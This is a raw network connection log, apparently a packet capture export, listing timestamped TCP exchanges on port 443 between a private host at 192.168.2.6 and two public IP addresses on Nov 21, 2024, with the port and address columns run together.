                                                                                                                                                                        Nov 21, 2024 10:38:37.197662115 CET4435000013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:37.288769960 CET50005443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:37.288817883 CET4435000513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:37.288878918 CET50005443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:37.290016890 CET50005443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:37.290034056 CET4435000513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:37.454674959 CET4435000113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:37.455199957 CET50001443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:37.455210924 CET4435000113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:37.455749035 CET50001443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:37.455753088 CET4435000113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:37.914167881 CET4435000113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:37.917346001 CET4435000113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:37.917490959 CET50001443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:37.917530060 CET50001443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:37.917546988 CET4435000113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:37.917557001 CET50001443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:37.917562008 CET4435000113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:37.920973063 CET50006443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:37.921020031 CET4435000613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:37.921101093 CET50006443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:37.921288013 CET50006443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:37.921305895 CET4435000613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:38.324510098 CET4435000213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:38.325922966 CET50002443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:38.325937033 CET4435000213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:38.326385021 CET50002443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:38.326390982 CET4435000213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:38.777615070 CET4435000213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:38.780610085 CET4435000213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:38.780819893 CET50002443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:38.780819893 CET50002443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:38.780819893 CET50002443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:38.783740997 CET50007443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:38.783874989 CET4435000713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:38.783970118 CET50007443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:38.784115076 CET50007443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:38.784131050 CET4435000713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:38.849370003 CET4435000313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:38.849824905 CET4435000413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:38.849946022 CET50003443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:38.849968910 CET4435000313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:38.850164890 CET50004443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:38.850204945 CET4435000413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:38.850378036 CET50003443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:38.850383997 CET4435000313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:38.850620985 CET50004443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:38.850632906 CET4435000413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.093852997 CET50002443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.093878031 CET4435000213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.140618086 CET4435000513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.141398907 CET50005443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.141432047 CET4435000513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.141833067 CET50005443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.141844034 CET4435000513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.291601896 CET4435000413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.293080091 CET4435000313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.295020103 CET4435000413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.295089960 CET50004443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.295129061 CET50004443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.295150995 CET4435000413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.295166969 CET50004443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.295173883 CET4435000413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.296159029 CET4435000313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.296209097 CET4435000313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.296257019 CET50003443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.296281099 CET50003443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.296320915 CET50003443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.296320915 CET50003443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.296335936 CET4435000313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.296343088 CET4435000313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.298172951 CET50008443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.298202991 CET4435000813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.298278093 CET50008443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.299169064 CET50009443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.299277067 CET50008443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.299282074 CET4435000913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.299288034 CET4435000813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.299365997 CET50009443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.299427986 CET50009443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.299451113 CET4435000913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.597379923 CET4435000513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.597418070 CET4435000513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.597481012 CET4435000513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.597500086 CET50005443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.597531080 CET50005443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.597740889 CET50005443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.597760916 CET4435000513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.597774029 CET50005443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.597779036 CET4435000513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.600307941 CET50010443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.600344896 CET4435001013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.600414991 CET50010443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.600538969 CET50010443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.600544930 CET4435001013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.767693043 CET4435000613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.768162966 CET50006443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.768192053 CET4435000613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:39.768774986 CET50006443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:39.768786907 CET4435000613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:40.010004997 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:40.010056973 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:40.010135889 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:40.011029005 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:40.011044025 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:40.222089052 CET4435000613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:40.222192049 CET4435000613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:40.222367048 CET50006443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:40.222428083 CET50006443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:40.222459078 CET4435000613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:40.222474098 CET50006443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:40.222481966 CET4435000613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:40.225279093 CET50012443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:40.225322008 CET4435001213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:40.225406885 CET50012443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:40.225594044 CET50012443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:40.225610971 CET4435001213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:40.508505106 CET4435000713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:40.509126902 CET50007443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:40.509164095 CET4435000713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:40.509604931 CET50007443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:40.509613991 CET4435000713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:40.940819025 CET4435000713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:40.944717884 CET4435000713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:40.944782019 CET50007443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:40.944798946 CET4435000713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:40.944852114 CET4435000713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:40.944907904 CET50007443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:40.944962025 CET50007443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:40.944972038 CET4435000713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:40.944983959 CET50007443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:40.944988966 CET4435000713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:40.947932005 CET50013443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:40.947978973 CET4435001313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:40.948045969 CET50013443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:40.948244095 CET50013443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:40.948260069 CET4435001313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.079233885 CET4435000813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.079828024 CET50008443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.079843044 CET4435000813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.080275059 CET50008443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.080281019 CET4435000813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.149367094 CET4435000913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.150024891 CET50009443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.150068045 CET4435000913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.150366068 CET50009443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.150383949 CET4435000913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.457782030 CET4435001013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.458246946 CET50010443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.458270073 CET4435001013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.458764076 CET50010443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.458767891 CET4435001013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.522552013 CET4435000813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.525690079 CET4435000813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.525882959 CET50008443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.525882959 CET50008443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.525882959 CET50008443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.528670073 CET50014443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.528712034 CET4435001413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.528781891 CET50014443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.528928041 CET50014443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.528939962 CET4435001413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.612629890 CET4435000913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.615691900 CET4435000913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.615736008 CET50009443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.615756035 CET4435000913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.615772009 CET4435000913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.615829945 CET50009443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.615829945 CET50009443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.615854025 CET50009443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.615861893 CET4435000913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.618724108 CET50015443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.618762970 CET4435001513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.618829012 CET50015443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.618964911 CET50015443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.618976116 CET4435001513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.827651024 CET50008443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.827682018 CET4435000813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.879719019 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.879812956 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:41.881582975 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:41.881589890 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.881820917 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.883085966 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:41.883137941 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:41.883147001 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.883234978 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:41.910773039 CET4435001013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.913851976 CET4435001013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.913917065 CET50010443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.914091110 CET50010443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.914091110 CET50010443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.914108038 CET4435001013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.914117098 CET4435001013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.916631937 CET50016443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.916662931 CET4435001613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.916737080 CET50016443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.916903973 CET50016443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:41.916913986 CET4435001613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:41.923326015 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:42.003685951 CET4435001213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:42.004128933 CET50012443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:42.004156113 CET4435001213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:42.004565001 CET50012443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:42.004570007 CET4435001213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:42.292061090 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:42.292154074 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:42.292321920 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:42.292419910 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:42.292438984 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:42.446847916 CET4435001213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:42.446866989 CET4435001213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:42.446937084 CET4435001213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:42.447016954 CET50012443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:42.447200060 CET50012443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:42.447200060 CET50012443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:42.449467897 CET50012443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:42.449485064 CET4435001213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:42.449867964 CET50017443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:42.449904919 CET4435001713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:42.449970007 CET50017443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:42.450103998 CET50017443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:42.450119019 CET4435001713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:42.795902967 CET4435001313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:42.796504974 CET50013443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:42.796520948 CET4435001313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:42.797065020 CET50013443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:42.797069073 CET4435001313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.250282049 CET4435001313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.250308990 CET4435001313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.250410080 CET50013443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:43.250433922 CET4435001313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.250698090 CET50013443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:43.250709057 CET4435001313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.250715971 CET50013443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:43.250901937 CET4435001313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.250941992 CET4435001313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.250982046 CET50013443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:43.253441095 CET50018443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:43.253480911 CET4435001813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.253551006 CET50018443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:43.253695965 CET50018443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:43.253707886 CET4435001813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.257874966 CET4435001413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.258302927 CET50014443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:43.258322001 CET4435001413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.258740902 CET50014443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:43.258747101 CET4435001413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.347868919 CET4435001513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.348525047 CET50015443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:43.348536015 CET4435001513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.349001884 CET50015443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:43.349006891 CET4435001513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.637387991 CET4435001613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.637892962 CET50016443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:43.637927055 CET4435001613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.638361931 CET50016443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:43.638369083 CET4435001613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.693716049 CET4435001413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.696851969 CET4435001413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.696902037 CET4435001413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.696928978 CET50014443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:43.696983099 CET50014443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:43.710246086 CET50014443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:43.710267067 CET4435001413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.710278034 CET50014443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:43.710283041 CET4435001413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.716185093 CET50019443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:43.716223955 CET4435001913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.716321945 CET50019443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:43.716439962 CET50019443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:43.716448069 CET4435001913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.785340071 CET4435001513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.785422087 CET4435001513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:43.785487890 CET50015443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:44.043361902 CET50015443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:44.043380022 CET4435001513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:44.043390989 CET50015443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:44.043395042 CET4435001513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:44.062550068 CET50020443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:44.062639952 CET4435002013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:44.062719107 CET50020443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:44.066951990 CET50020443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:44.066982985 CET4435002013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:44.074091911 CET4435001613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:44.077188015 CET4435001613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:44.077235937 CET50016443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:44.077244043 CET4435001613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:44.077256918 CET4435001613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:44.077307940 CET50016443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:44.077564001 CET50016443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:44.077570915 CET4435001613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:44.077580929 CET50016443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:44.077584982 CET4435001613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:44.099400043 CET50021443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:44.099452019 CET4435002113.107.246.60192.168.2.6
